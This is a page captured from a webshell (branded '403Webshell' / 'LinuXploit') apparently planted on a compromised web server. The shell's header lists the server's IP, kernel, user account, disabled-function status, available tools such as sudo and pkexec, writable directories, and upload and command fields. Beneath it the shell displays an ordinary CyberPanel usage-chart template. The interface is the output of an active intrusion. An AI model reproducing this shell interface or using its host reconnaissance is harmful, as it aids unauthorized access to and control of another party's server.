403Webshell
Server IP : 202.155.9.38  /  Your IP : 216.73.217.134
Web Server : LiteSpeed
System : Linux srv733443859 5.15.0-179-generic #189-Ubuntu SMP Tue May 5 18:20:56 UTC 2026 x86_64
User : rabbi4843 ( 1044)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/local/CyberCP/CLManager/templates/CLManager/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/CyberCP/CLManager/templates/CLManager/websiteContainerLimit.html
{% extends "baseTemplate/index.html" %}
{% load i18n %}
{% block title %}{{ domain }}{% trans " usage - CyberPanel" %}{% endblock %}
{% block content %}

    {% load static %}
    {% get_current_language as LANGUAGE_CODE %}
    <!-- Current language: {{ LANGUAGE_CODE }} -->


    <div ng-controller="websiteContainerLimitCL" class="container">

        <div id="page-title">
            <h2 id="domainNamePage">{% trans "Usage" %}</h2>
            <p>{% trans "View CPU, Memory and Disk usage for " %} <span id="domain">{{ domain }}</span></p>
        </div>

        <div class="panel">
            <div class="panel-body">
                <h2 class="title-hero">
                    {% trans "CPU Usage of" %} {{ domain }}
                </h2>
                <div class="example-box-wrapper">
                    <div id="flot-placeholder1" style="width:auto;height:300px"></div>

                </div>
            </div>
            <div class="panel-body">
                <h2 class="title-hero">
                    {% trans "Memory Usage of" %} {{ domain }}
                </h2>
                <div class="example-box-wrapper">
                    <div id="memoryUsage" style="width:auto;height:300px"></div>

                </div>
            </div>
            <div class="panel-body">
                <h2 class="title-hero">
                    {% trans "Disk Usage of" %} {{ domain }}
                </h2>
                <div class="example-box-wrapper">
                    <div id="diskUsage" style="width:auto;height:300px"></div>

                </div>
            </div>
        </div>

    </div>



{% endblock %}

Youez - 2016 - github.com/yon3zu
LinuXploit